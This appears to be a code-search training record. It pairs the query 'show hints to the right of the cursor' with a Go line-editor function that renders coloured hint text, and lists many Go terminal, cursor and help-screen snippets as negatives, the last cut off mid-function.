[ "0.6745055", "0.66499245", "0.6545055", "0.6524213", "0.64737916", "0.6460544", "0.64597934", "0.62575334", "0.6241871", "0.62060475", "0.6071826", "0.6039111", "0.60130143", "0.6007517", "0.59933984", "0.5969025", "0.59652334", "0.59541774", "0.59541774", "0.5943652", "0.58415484", "0.58294255", "0.5802715", "0.57851535", "0.577501", "0.5763942", "0.5760619", "0.57473916", "0.57142085", "0.5713521", "0.5676455", "0.56190515", "0.56043446", "0.5587513", "0.55870074", "0.55174017", "0.5490415", "0.5487863", "0.5437139", "0.5436675", "0.5428342", "0.5413688", "0.5411709", "0.54099154", "0.54069537", "0.537854", "0.53673995", "0.5340753", "0.5333992", "0.53176147", "0.5313091", "0.52997565", "0.5296714", "0.5274669", "0.5272068", "0.52705956", "0.5256506", "0.5249889", "0.52352124", "0.52304435", "0.5226973", "0.52233094", "0.52111953", "0.52084255", "0.5195442", "0.5183287", "0.51519114", "0.5150953", "0.5149685", "0.5149269", "0.5149269", "0.51447994", "0.51388735", "0.5123036", "0.5121781", "0.51004714", "0.5080585", "0.50738955", "0.50709915", "0.5064581", "0.5055989", "0.50514007", "0.5026622", "0.502607", "0.5025554", "0.5013528", "0.5010622", "0.50058365", "0.49937814", "0.49902567", "0.49870548", "0.4984599", "0.49832538", "0.49832436", "0.49804893", "0.49744195", "0.49726787", "0.49645436", "0.49555188", "0.4953551" ]
0.7082624
0
show hints to the right of the cursor
func (ls *linestate) refreshShowHints() []string { // do we have a hints callback? if ls.ts.hintsCallback == nil { // no hints return nil } // How many columns do we have for the hint? hintCols := ls.cols - ls.promptWidth - runewidth.StringWidth(string(ls.buf)) if hintCols <= 0 { // no space to display hints return nil } // get the hint h := ls.ts.hintsCallback(string(ls.buf)) if h == nil || len(h.Hint) == 0 { // no hints return nil } // trim the hint until it fits hEnd := len(h.Hint) for runewidth.StringWidth(h.Hint[:hEnd]) > hintCols { hEnd-- } // color fixup if h.Bold && h.Color < 0 { h.Color = 37 } // build the output string seq := make([]string, 0, 3) if h.Color >= 0 || h.Bold { seq = append(seq, fmt.Sprintf("\033[%d;%d;49m", btoi(h.Bold), h.Color)) } seq = append(seq, h.Hint[:hEnd]) if h.Color >= 0 || h.Bold { seq = append(seq, "\033[0m") } return seq }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func setCursorLoc(x, y int) {\n\tfmt.Printf(\"\\033[%v;%vH\", y, x)\n}", "func printHint() {\n\tprint(\"orbi - Embeddable Interactive ORuby Shell\\n\\n\")\n}", "func (d *Display) CursorRight() error {\n\t_, err := d.port.Write([]byte(CursorRight))\n\treturn err\n}", "func (w *VT100Writer) ShowCursor() {\n\tw.WriteRaw([]byte{0x1b, '[', '?', '1', '2', 'l', 0x1b, '[', '?', '2', '5', 'h'})\n}", "func ShowFakeCursor(x, y int) {\n\tr, combc, style, _ := Screen.GetContent(x, y)\n\tScreen.SetContent(lastCursor.x, lastCursor.y, lastCursor.r, lastCursor.combc, lastCursor.style)\n\tScreen.SetContent(x, y, r, combc, config.DefStyle.Reverse(true))\n\n\tlastCursor.x, lastCursor.y = x, y\n\tlastCursor.r = r\n\tlastCursor.combc = combc\n\tlastCursor.style = style\n}", "func showCursor() {\n\tfmt.Printf(\"\\033[?25h\")\n}", "func (i *Input) CursorRight() {\n\tif i.Pos < i.Buffer.Len() {\n\t\ti.Pos++\n\t}\n}", "func hints(s string) *cli.Hint {\n\tif s == \"hello\" {\n\t\t// string, color, bold\n\t\treturn &cli.Hint{\" World\", 35, false}\n\t}\n\treturn nil\n}", "func ShowCursor() {\n\tfmt.Printf(\"\\033[?25h\")\n}", "func ShowCursor() {\n\tfmt.Printf(\"\\033[?25h\")\n}", "func (e *LineEditor) CursorRight() {\n\t// right moves only if we're within a valid line.\n\t// for past EOF, there's no movement\n\tif e.Cx < len(e.Row) {\n\t\te.Cx++\n\t}\n}", "func ShowCursor() {\n\tfmt.Printf(CSI + ShowCursorSeq)\n}", "func ShowPreface(username string, duration int, free bool) {\n\ttb.Clear(tbutil.COLDEF, tbutil.COLDEF)\n\tcd := 3\n\tvar freestr string\n\tvar mode string\n\tif free {\n\t\tmode = \"Freestyle\"\n\t\tfreestr = \"For this mode, you aren't given a writing prompt. You can write whatever you please before the timer runs out.\" +\n\t\t\t\" During the test, press the Enter key to commit your sentence and begin a new line. You can also press the escape key to end the test.\"\n\t} else {\n\t\tmode = \"Prompt-Matching\"\n\t\tfreestr = \"For this mode, you are given a writing prompt to copy. You should try to match the prompt exactly.\" +\n\t\t\t\" During the test, press the Enter key to commit your sentence and recieve a new writing prompt. You can also press the escape key to end the test.\"\n\t}\n\n\n\tparams := fmt.Sprintf(\"[Test Mode: %s, Duration: %ds]\", mode, duration)\n\tpre := fmt.Sprintf(\"Welcome to my typing speed test, %s. This program will count down from %d, and then it'll measure how fast you can type words. %s\"+\n\t\t\" When you're ready, press any key to begin...\", username, cd, freestr)\n\n\t_, y := tbutil.Write(0, 0, tbutil.COLDEF, tbutil.COLDEF, params)\t\n\ttbutil.Write(0, y + 2, tbutil.COLDEF, tbutil.COLDEF, pre)\n\n\ttbutil.KeyContinue(false)\n\n\ttbutil.CountDown(0, 0, 3, \"%s\", nil)\n}", "func ShowFakeCursorMulti(x, y int) {\n\tr, _, _, _ := Screen.GetContent(x, y)\n\tScreen.SetContent(x, y, r, nil, config.DefStyle.Reverse(true))\n}", "func (app *App) showCommandTips(name string) {\n\tDebugf(\"will find and show similar command tips\")\n\n\tcolor.Error.Tips(`unknown input command \"<mga>%s</>\"`, name)\n\tif ns := app.findSimilarCmd(name); len(ns) > 0 {\n\t\tcolor.Printf(\"\\nMaybe you mean:\\n <green>%s</>\\n\", strings.Join(ns, \", \"))\n\t}\n\n\tcolor.Printf(\"\\nUse <cyan>%s --help</> to see available commands\\n\", app.Ctx.binName)\n}", "func (hw *HighlightedWriter) ShowCursor() {\n\thw.delegate.ShowCursor()\n}", "func (w *Window) SetHints(hints hints) {\n\tw.hints |= hints\n}", "func ShowCursor(x, y int) {\n\tif UseFake() {\n\t\tShowFakeCursor(x, y)\n\t} else {\n\t\tScreen.ShowCursor(x, y)\n\t}\n}", "func MoveCursorForward(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dC\", bias)\n}", "func displayInstructions(s tcell.Screen) {\n emitStr(s, 2, 2, tcell.StyleDefault, \"Press f/b to go to next/previous stretches\")\n emitStr(s, 2, 3, tcell.StyleDefault, \"Press p to toggle pause\")\n emitStr(s, 2, 4, tcell.StyleDefault, \"Press ESC exit\")\n return\n}", "func Display(possible ...Cmd) {\n\thint := randHint(possible)\n\tif hint != \"\" {\n\t\tui.Hint(hint, false)\n\t}\n}", "func CursorPos(x, y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \";\" + strconv.Itoa(x+1) + \"H\"\n}", "func Hint(target, mode Enum) {\n\tgl.Hint(uint32(target), uint32(mode))\n}", "func (e *LineEditor) CursorLeft() {\n\n\tif e.Cx > 0 {\n\t\te.Cx--\n\t}\n}", "func (tm *Term) ScrollRight() error {\n\ttm.ColSt++ // no obvious max\n\treturn tm.Draw()\n}", "func (m Model) cursorView(v string) string {\n\tif m.blink {\n\t\treturn m.TextStyle.Render(v)\n\t}\n\treturn m.CursorStyle.Inline(true).Reverse(true).Render(v)\n}", "func (d *Display) CursorLeft() error {\n\t_, err := d.port.Write([]byte(CursorLeft))\n\treturn err\n}", "func (ls *linestate) editMoveRight() {\n\tif ls.pos != len(ls.buf) {\n\t\tls.pos++\n\t\tls.refreshLine()\n\t}\n}", "func (t *ATrains) ShowPos() {\n\tfmt.Println(\"wszystkie pociagi - pozycje\")\n\n\tfor i := 0; i < len(t.trains); i++ {\n\t\tt.trains[i].ShowPos()\n\t}\n\n\tfmt.Println(\"\")\n}", "func Hint(target GLenum, mode GLenum) {\n\tC.glHint(C.GLenum(target), C.GLenum(mode))\n}", "func WithCursorHints(hints ...CursorHint) CursorOption {\n\treturn func(c *CursorConfig) {\n\t\tfor _, hint := range hints {\n\t\t\thint(&c.Hints)\n\t\t}\n\t}\n}", "func keyHelp(myWin fyne.Window) {\n\tstep1 := \"1.chrome F12\"\n\tstep2 := \"2.source\"\n\tstep3 := \"3.theoplayer.d.js\"\n\tstep4 := \"4.break: \" + services.JSConsole[0]\n\tstep5 := \"5.copy code to console\"\n\tstep6 := \"6.copy to key\"\n\tuiKeyTip := fmt.Sprintf(\"%-28s\\n%-33s\\n%-28s\\n%-25s\\n%-6s\\n%-30s\", step1, step2, step3, step4, step5, step6)\n\tuiKeyDialog := dialog.NewConfirm(\"Get Key\", uiKeyTip, func(res bool) {\n\t\tif res {\n\t\t\tmyWin.Clipboard().SetContent(services.JSConsole[1])\n\t\t}\n\t}, myWin)\n\n\tuiKeyDialog.SetDismissText(\"Cancel\")\n\tuiKeyDialog.SetConfirmText(\"Copy\")\n\tuiKeyDialog.Show()\n}", "func LogHint(reason string) {\n\t// no-op when hints not enabled\n}", "func (view *DetailsView) KeyHelp() string {\n\treturn \"TBD\"\n}", "func hideCursor() {\n\tfmt.Printf(\"\\033[?25l\")\n}", "func (tm *Term) FixRight() error {\n\ttm.FixCols++ // no obvious max\n\treturn tm.Draw()\n}", "func printMarkerSuggestions(markers []osgraph.Marker, suggest bool, out *tabwriter.Writer, indent string) int {\n\tsuggestionAmount := 0\n\tfor _, marker := range markers {\n\t\tif len(marker.Suggestion) > 0 {\n\t\t\tsuggestionAmount++\n\t\t}\n\t\tif len(marker.Message) > 0 && (suggest || marker.Severity == osgraph.ErrorSeverity) {\n\t\t\tfmt.Fprintln(out, indent+\"* \"+marker.Message)\n\t\t}\n\t\tif len(marker.Suggestion) > 0 && suggest {\n\t\t\tswitch s := marker.Suggestion.String(); {\n\t\t\tcase strings.Contains(s, \"\\n\"):\n\t\t\t\tfmt.Fprintln(out)\n\t\t\t\tfor _, line := range strings.Split(s, \"\\n\") {\n\t\t\t\t\tfmt.Fprintln(out, indent+\" \"+line)\n\t\t\t\t}\n\t\t\tcase len(s) > 0:\n\t\t\t\tfmt.Fprintln(out, indent+\" try: \"+s)\n\t\t\t}\n\t\t}\n\t}\n\treturn suggestionAmount\n}", "func (c *Completer) Help(ctx *Context, content IContent, line interface{}, index int) (interface{}, bool) {\n\treturn nil, false\n}", "func CursorPosY(y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \"d\"\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func MoveCursorDown(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dB\", bias)\n}", "func (c *Console) ShowCursor() *Console {\n\tPrint(_CSI + \"?25h\")\n\treturn c\n}", "func FlattenHints(err error) string { return hintdetail.FlattenHints(err) }", "func (b *Buffer) getCursorMinXPos() int {\n return b.getLineMetaChars() + 1\n}", "func MoveTopLeft() {\n\tfmt.Print(\"\\033[H\")\n}", "func DrawHelp(v *gocui.View) {\n\n\tfmt.Fprint(v, style.Header(`\n\t--> PRESS CTRL+I TO CLOSE THIS AND CONTINUE. YOU CAN OPEN IT AGAIN WITH CRTL+I AT ANY TIME. <-- \n _ ___ \n /_\\ __| _ )_ _ _____ __ _____ ___ \n / _ \\ |_ / _ \\ '_/ _ \\ V V (_-</ -_) \n /_/ \\_\\/__|___/_| \\___/\\_/\\_//__/\\___| \n Interactive CLI for browsing Azure resources \n# Navigation \n \n| Key | Does | \n| ----------- | -------------------- | \n| ⇧ / ⇩ | Select resource | \n| ⇦ / ⇨ | Select Menu/JSON | \n| Backspace | Go back | \n| ENTER | Expand/View resource | \n| F5 | Refresh | \n| CTRL+I | Show this page | \n \n# Operations\t \n \n| Key | Does | | \n| ------------------- | ------------------------- | ---------------------------------------------------------------------------------- | \n| CTRL+E | Toggle Browse JSON | For longer responses you can move the cursor to scroll the doc | \n| CTLT+F | Toggle Fullscreen | Gives a fullscreen view of the JSON for smaller terminals | \n| CTRL+O (o for open) | Open Portal | Opens the portal at the currently selected resource | \n| DEL | Delete resource | The currently selected resource will be deleted (Requires double press to confirm) | \n| CTLT+S | Save JSON to clipboard | Saves the last JSON response to the clipboard for export | \n| CTLT+A | View Actions for resource | This allows things like ListKeys on storage or Restart on VMs | \n \nFor bugs, issue or to contribute visit: https://github.com/lawrencegripper/azbrowse \n \n# Status Icons \n \nDeleting: ☠ Failed: ⛈ Updating: ⟳ Resuming/Starting: ⛅ Provisioning: ⌛ \nCreating\\Preparing: 🏗 Scaling: ⚖ Suspended/Suspending: ⛔ Succeeded: 🌣 \n \n--> PRESS CTRL+I TO CLOSE THIS AND CONTINUE. YOU CAN OPEN IT AGAIN WITH CRTL+I AT ANY TIME. <-- \n\n`))\n\n}", "func SaveCursorPosition() {\n\tfmt.Printf(\"\\033[s\")\n}", "func SaveCursorPosition() {\n\tfmt.Printf(\"\\033[s\")\n}", "func (i *Input) CursorLeft() {\n\tif i.Pos > 0 {\n\t\ti.Pos--\n\t}\n}", "func (e *BadSpotError) IsShowAllHelp() {}", "func CursorNextLine(n int) {\n\tfmt.Printf(CSI+CursorNextLineSeq, n)\n}", "func MoveCursorBackward(bias int) {\n\tfmt.Fprintf(Screen, \"\\033[%dD\", bias)\n}", "func SaveCursorPos() {\n\temitEscape(\"s\")\n}", "func (w *VT100Writer) RestoreCursor() {\n\t//fmt.Fprintln(os.Stderr, \"\\x1b[33;1mRCP\\x1b[m\")\n\tw.WriteRaw([]byte{0x1b, '[', 'u'})\n}", "func MoveCursor(x int, y int) {\n\tfmt.Fprintf(Screen, \"\\033[%d;%dH\", y, x)\n}", "func CursorNextLine(r uint) {\n\temitEscape(\"E\", r)\n}", "func (q *Query) Hint(hint interface{}) QueryI {\n\tnewQ := q\n\tnewQ.hint = hint\n\treturn newQ\n}", "func\tprint_flag(index int, environ Environ, width int, height int) {\n\tvar title\tstring\n\tvar x\t\tint\n\tvar y\t\tint\n\n\tgoterm.MoveCursor(0, 1)\n\tgoterm.Printf(\"step: %d/%d\", index, environ.Limit)\n\n\ttitle = \"Langton's Ant\"\n\tx = (width / 2) - (len(title) / 2)\n\ty = height / 16\n\n\tgoterm.MoveCursor(x, y)\n\tgoterm.Printf(\"%s\", title)\n}", "func CompletionRight(content, flag string, length int) string {\n\tif length <= 0 {\n\t\treturn \"\"\n\t}\n\tif len(content) >= length {\n\t\treturn string(content[0:length])\n\t}\n\n\tflagsLegth := length - len(content)\n\tflags := flag\n\tfor {\n\t\tif len(flags) == flagsLegth {\n\t\t\tbreak\n\t\t} else if len(flags) > flagsLegth {\n\t\t\tflags = string(flags[0:flagsLegth])\n\t\t\tbreak\n\t\t} else {\n\t\t\tflags = flags + flag\n\t\t}\n\t}\n\treturn content + flags\n}", "func (w *VT100Writer) CursorBack(n int) {\n\tif n < 0 {\n\t\tw.CursorForward(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'D'})\n\t}\n}", "func (s *SoracomCompleter) flagSuggestions(line string) []prompt.Suggest {\n\tcommands, flags := splitToCommandsAndFlags(line) // split again...\n\tmethods, found := s.searchMethods(commands)\n\tif !found || len(methods) != 1 {\n\t\treturn []prompt.Suggest{{\n\t\t\tText: \"Error\",\n\t\t\tDescription: \"cannot find matching command\",\n\t\t}}\n\t}\n\tmethod := methods[0]\n\n\tparams := make([]param, 0) // all parameters for the method\n\tfor _, p := range method.Parameters {\n\t\tparams = append(params, param{\n\t\t\tname: strings.ReplaceAll(p.Name, \"_\", \"-\"),\n\t\t\trequired: p.Required,\n\t\t\tdescription: p.Description,\n\t\t\tparamType: p.Type,\n\t\t\tenum: p.Enum,\n\t\t})\n\t}\n\n\t// soracom-cli will augment some commands with 'fetch-all' option, which is not defined in the swagger\n\tfor _, a := range commandsWithFetchAll {\n\t\tif strings.HasPrefix(commands, a) {\n\t\t\tparams = append(params, param{\n\t\t\t\tname: \"fetch-all\",\n\t\t\t\trequired: false,\n\t\t\t\tdescription: \"Do pagination automatically.\",\n\t\t\t})\n\t\t}\n\t}\n\n\tsort.Slice(params, func(i, j int) bool {\n\t\treturn params[i].name < params[j].name\n\t})\n\n\tflagsArray := strings.Split(flags, \" \")\n\tlastWord := flagsArray[len(flagsArray)-1]\n\tisEnteringFlag := true\n\n\tif len(flagsArray) > 1 {\n\t\tif strings.HasPrefix(flagsArray[len(flagsArray)-2], \"--\") &&\n\t\t\t(strings.HasSuffix(line, \" \") || !strings.HasPrefix(lastWord, \"--\")) {\n\t\t\tisEnteringFlag = false\n\t\t}\n\t}\n\tif strings.HasSuffix(line, \" \") {\n\t\tisEnteringFlag = false\n\t}\n\tif len(flagsArray)%2 == 0 && !strings.HasPrefix(lastWord, \"--\") && strings.HasSuffix(line, \" \") {\n\t\tisEnteringFlag = true\n\t}\n\n\tvar lastFlag string\n\tfor i := len(flagsArray) - 1; i >= 0; i-- {\n\t\tif strings.HasPrefix(flagsArray[i], \"--\") {\n\t\t\tlastFlag = strings.ReplaceAll(flagsArray[i], \"--\", \"\")\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// provide flag name suggestion if user is entering flag\n\tif isEnteringFlag {\n\t\tr := make([]prompt.Suggest, 0)\n\t\tfor _, p := range params {\n\t\t\tif !contains(parseFlags(flags), lib.OptionCase(p.name)) {\n\t\t\t\trequired := \"\"\n\t\t\t\tif p.required {\n\t\t\t\t\trequired = \"(required) \"\n\t\t\t\t}\n\n\t\t\t\tr = append(r, prompt.Suggest{\n\t\t\t\t\tText: \"--\" + lib.OptionCase(p.name),\n\t\t\t\t\tDescription: required + p.description,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\t\treturn filterFunc(r, lastWord, prompt.FilterFuzzy)\n\t}\n\n\tif strings.HasPrefix(lastWord, \"--\") {\n\t\tlastWord = \"\"\n\t}\n\n\t// value suggestion\n\t// if last flag's value type is enum, provide possible values\n\tvar suggests []prompt.Suggest\n\tfor _, p := range params {\n\t\tif p.name == lastFlag {\n\t\t\tif len(p.enum) > 0 {\n\t\t\t\tfor _, e := range p.enum {\n\t\t\t\t\tsuggests = append(suggests, prompt.Suggest{\n\t\t\t\t\t\tText: e,\n\t\t\t\t\t\tDescription: \"\",\n\t\t\t\t\t})\n\t\t\t\t}\n\t\t\t}\n\t\t\tif len(suggests) > 0 {\n\t\t\t\treturn filterFunc(suggests, lastWord, prompt.FilterFuzzy)\n\t\t\t}\n\t\t}\n\t}\n\n\t// if specific name is found, do more intelligent completion\n\tswitch lastFlag {\n\tcase \"status-filter\":\n\t\treturn s.statusFilterSuggestions(lastWord)\n\tcase \"speed-class-filter\":\n\t\treturn s.speedClassFilterSuggestions(lastWord)\n\tcase \"device-id\":\n\t\tif strings.HasPrefix(commands, \"device\") {\n\t\t\treturn s.inventoryDeviceIDFilterSuggestions(lastWord)\n\t\t}\n\t\tif strings.HasPrefix(commands, \"sigfox\") {\n\t\t\treturn s.sigfoxDeviceIDFilterSuggestions(lastWord)\n\t\t}\n\tcase \"imsi\":\n\t\treturn s.imsiFilterSuggestions(lastWord)\n\tcase \"order-id\":\n\t\treturn s.orderFilterSuggestions(lastWord)\n\tcase \"resource-id\": // `logs get` or `audit-logs napter get` uses 'resource-id' for imsi\n\t\treturn s.imsiFilterSuggestions(lastWord)\n\tcase \"group-id\":\n\t\treturn s.groupFilterSuggestions(lastWord)\n\t}\n\n\treturn suggests\n}", "func WithHintf(err error, format string, args ...interface{}) error {\n\treturn hintdetail.WithHintf(err, format, args...)\n}", "func (tv *TextView) ScrollCursorToRight() bool {\n\tcurBBox := tv.CursorBBox(tv.CursorPos)\n\treturn tv.ScrollToRight(curBBox.Max.X)\n}", "func (m *Model) wordRight() bool {\n\tif m.pos >= len(m.value) || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.cursorEnd()\n\t}\n\n\tblink := false\n\ti := m.pos\n\tfor i < len(m.value) {\n\t\tif unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\ti++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor i < len(m.value) {\n\t\tif !unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\ti++\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn blink\n}", "func (obj *Device) ShowCursor(show bool) bool {\n\tret, _, _ := syscall.Syscall(\n\t\tobj.vtbl.ShowCursor,\n\t\t2,\n\t\tuintptr(unsafe.Pointer(obj)),\n\t\tuintptrBool(show),\n\t\t0,\n\t)\n\treturn ret != 0\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func randHint(possible []Cmd) string {\n\tl := len(possible)\n\tif l == 0 {\n\t\treturn \"\"\n\t}\n\n\t// Seed random integer\n\tr := rand.New(rand.NewSource(time.Now().UTC().UnixNano()))\n\ti := r.Intn(l)\n\tcmd := possible[i]\n\tif hints, ok := commandHints[cmd]; ok {\n\t\titem := r.Intn(len(hints))\n\t\tif len(hints) > item {\n\t\t\treturn hints[item]\n\t\t}\n\t}\n\treturn \"\"\n}", "func PrintStrOnErrAt(msg string, y, x int) {\n fmt.Fprintf(os.Stderr, \"\\033[%d;%dH%s\", y, x, msg)\n}", "func Offset(dx, dy float32) {\n\tgContext.Cursor.X += dx\n\tgContext.Cursor.Y += dy\n}", "func ShowHelp() {\n\tfmt.Printf(\"%v\\n\", helpText)\n}", "func HideCursor() {\n\tfmt.Printf(\"\\033[?25l\")\n}", "func HideCursor() {\n\tfmt.Printf(\"\\033[?25l\")\n}", "func (e *LineEditor) CursorEnd() {\n\te.Cx = len(e.Row)\n}", "func (hw *HighlightedWriter) CursorForward(n int) {\n\thw.delegate.CursorForward(n)\n}", "func RestoreCursorPos() {\n\temitEscape(\"u\")\n}", "func (v *Layer) KeyHelp() string {\n\tvar help string\n\tfor _, binding := range v.helpKeys {\n\t\thelp += binding.RenderKeyHelp()\n\t}\n\treturn help\n}", "func GetAllHints(err error) []string { return hintdetail.GetAllHints(err) }", "func (m *Meow) Hints() model.MenuHints {\n\treturn m.actions.Hints()\n}", "func PrintCommandLineWithCursor(cmd *cobra.Command, it *vt.Iterator) {\n\tif cursor := it.Cursor(); cursor != \"\" {\n\t\targs := cmd.Flags().Args()\n\t\tfor i, arg := range args {\n\t\t\targs[i] = fmt.Sprintf(\"'%s'\", arg)\n\t\t}\n\t\tflags := make([]string, 0)\n\t\tcmd.Flags().Visit(func(flag *pflag.Flag) {\n\t\t\tif flag.Name != \"cursor\" {\n\t\t\t\tvar f string\n\t\t\t\tswitch flag.Value.Type() {\n\t\t\t\tcase \"stringSlice\":\n\t\t\t\t\tss, _ := cmd.Flags().GetStringSlice(flag.Name)\n\t\t\t\t\tf = fmt.Sprintf(\"--%s='%s'\", flag.Name, strings.Join(ss, \",\"))\n\t\t\t\tdefault:\n\t\t\t\t\tf = fmt.Sprintf(\"--%s=%v\", flag.Name, flag.Value.String())\n\t\t\t\t}\n\t\t\t\tflags = append(flags, f)\n\t\t\t}\n\t\t})\n\t\tflags = append(flags, fmt.Sprintf(\"--cursor=%s\", cursor))\n\t\tcolor.New(color.Faint).Fprintf(\n\t\t\tansi.NewAnsiStderr(), \"\\nMORE WITH:\\n%s %s %s\\n\",\n\t\t\tcmd.CommandPath(), strings.Join(args, \" \"), strings.Join(flags, \" \"))\n\t}\n}", "func (c *Command) Help(ib *irc.Connection, from string) {\n\tif !c.Started {\n\t\treturn\n\t}\n\tib.Privmsg(from, \"Displays if someone is afk or the time since their last message.\")\n\tib.Privmsg(from, \"Example : !seen nickname\")\n}", "func Tip(v ...interface{}) {\n\tprint(TipFont)\n\tfmt.Print(v...)\n\tterminal.Reset()\n}", "func Hint(target Enum, mode Enum) {\n\tctarget, _ := (C.GLenum)(target), cgoAllocsUnknown\n\tcmode, _ := (C.GLenum)(mode), cgoAllocsUnknown\n\tC.glHint(ctarget, cmode)\n}", "func (c *Context) WindowHint(hint Hint, value HintValue) {\n\tC.glfwWindowHint(C.int(hint), C.int(value))\n}", "func (c *Context) WindowHint(hint Hint, value HintValue) {\n\tC.glfwWindowHint(C.int(hint), C.int(value))\n}", "func CursorPrevLine(n int) {\n\tfmt.Printf(CSI+CursorPreviousLineSeq, n)\n}", "func (v *Status) KeyHelp() string {\n\tvar help string\n\tfor _, binding := range v.helpKeys {\n\t\thelp += binding.RenderKeyHelp()\n\t}\n\treturn help\n}", "func ShowMultiCursor(screen tcell.Screen, x, y, i int) {\n\tif i == 0 {\n\t\tscreen.ShowCursor(x, y)\n\t} else {\n\t\tr, _, _, _ := screen.GetContent(x, y)\n\t\tscreen.SetContent(x, y, r, nil, defStyle.Reverse(true))\n\t}\n}", "func (w *VT100Writer) CursorForward(n int) {\n\tif n < 0 {\n\t\tw.CursorBack(-n)\n\t} else if n > 0 {\n\t\ts := strconv.Itoa(n)\n\t\tw.WriteRaw([]byte{0x1b, '['})\n\t\tw.WriteRaw([]byte(s))\n\t\tw.WriteRaw([]byte{'C'})\n\t}\n}", "func getSuggestDescription(meta *meta, args []string, suggest string) string {\n\tcommand := getCommand(meta, args, suggest)\n\tif command == nil {\n\t\treturn \"command not found\"\n\t}\n\n\tif argIsOption(suggest) {\n\t\toption := command.ArgSpecs.GetByName(optionToArgSpecName(suggest))\n\t\tif option != nil {\n\t\t\treturn option.Short\n\t\t}\n\t\treturn \"\"\n\t}\n\n\tif argIsPositional(command, suggest) {\n\t\toption := command.ArgSpecs.GetPositionalArg()\n\t\tif option != nil {\n\t\t\treturn option.Short\n\t\t}\n\t\treturn \"\"\n\t}\n\n\t// Should be a command, just use command short\n\treturn command.Short\n}", "func (p *Limit) ExplainInfo() string {\n\treturn fmt.Sprintf(\"offset:%v, count:%v\", p.Offset, p.Count)\n}", "func CursorPosX(x int) string {\n\treturn Esc + strconv.Itoa(x+1) + \"G\"\n}", "func (tv *TextView) OfferCorrect() bool {\n\tif tv.Buf.SpellCorrect == nil || tv.ISearch.On || tv.QReplace.On || tv.IsInactive() {\n\t\treturn false\n\t}\n\tsel := tv.SelectReg\n\tif !tv.SelectWord() {\n\t\ttv.SelectReg = sel\n\t\treturn false\n\t}\n\ttbe := tv.Selection()\n\tif tbe == nil {\n\t\ttv.SelectReg = sel\n\t\treturn false\n\t}\n\ttv.SelectReg = sel\n\twb := string(tbe.ToBytes())\n\twbn := strings.TrimLeft(wb, \" \\t\")\n\tif len(wb) != len(wbn) {\n\t\treturn false // SelectWord captures leading whitespace - don't offer if there is leading whitespace\n\t}\n\tsugs, knwn, err := tv.Buf.SpellCorrect.CheckWordInline(wb)\n\tif knwn || err != nil {\n\t\treturn false\n\t}\n\ttv.Buf.SpellCorrect.Suggestions = sugs\n\ttv.Buf.SpellCorrect.Word = wb\n\ttv.Buf.SpellCorrect.SrcLn = tbe.Reg.Start.Ln\n\ttv.Buf.SpellCorrect.SrcCh = tbe.Reg.Start.Ch\n\n\tcpos := tv.CharStartPos(tv.CursorPos).ToPoint() // physical location\n\tcpos.X += 5\n\tcpos.Y += 10\n\ttv.Buf.CurView = tv\n\ttv.Buf.SpellCorrect.Show(wb, tv.Viewport, cpos)\n\treturn true\n}", "func (tv *TextView) MouseEvent(me *mouse.Event) {\n\tif !tv.HasFocus() {\n\t\ttv.GrabFocus()\n\t}\n\ttv.SetFlag(int(TextViewFocusActive))\n\tme.SetProcessed()\n\tif tv.Buf == nil || tv.Buf.NumLines() == 0 {\n\t\treturn\n\t}\n\tpt := tv.PointToRelPos(me.Pos())\n\tnewPos := tv.PixelToCursor(pt)\n\tswitch me.Button {\n\tcase mouse.Left:\n\t\tif me.Action == mouse.Press {\n\t\t\tme.SetProcessed()\n\t\t\tif _, got := tv.OpenLinkAt(newPos); got {\n\t\t\t} else {\n\t\t\t\ttv.SetCursorFromMouse(pt, newPos, me.SelectMode())\n\t\t\t\ttv.SavePosHistory(tv.CursorPos)\n\t\t\t}\n\t\t} else if me.Action == mouse.DoubleClick {\n\t\t\tme.SetProcessed()\n\t\t\tif tv.HasSelection() {\n\t\t\t\tif tv.SelectReg.Start.Ln == tv.SelectReg.End.Ln {\n\t\t\t\t\tsz := tv.Buf.LineLen(tv.SelectReg.Start.Ln)\n\t\t\t\t\tif tv.SelectReg.Start.Ch == 0 && tv.SelectReg.End.Ch == sz {\n\t\t\t\t\t\ttv.SelectReset()\n\t\t\t\t\t} else { // assume word, go line\n\t\t\t\t\t\ttv.SelectReg.Start.Ch = 0\n\t\t\t\t\t\ttv.SelectReg.End.Ch = sz\n\t\t\t\t\t}\n\t\t\t\t} else {\n\t\t\t\t\ttv.SelectReset()\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tif tv.SelectWord() {\n\t\t\t\t\ttv.CursorPos = tv.SelectReg.Start\n\t\t\t\t}\n\t\t\t}\n\t\t\ttv.RenderLines(tv.CursorPos.Ln, tv.CursorPos.Ln)\n\t\t}\n\tcase mouse.Middle:\n\t\tif !tv.IsInactive() && me.Action == mouse.Press {\n\t\t\tme.SetProcessed()\n\t\t\ttv.SetCursorFromMouse(pt, newPos, 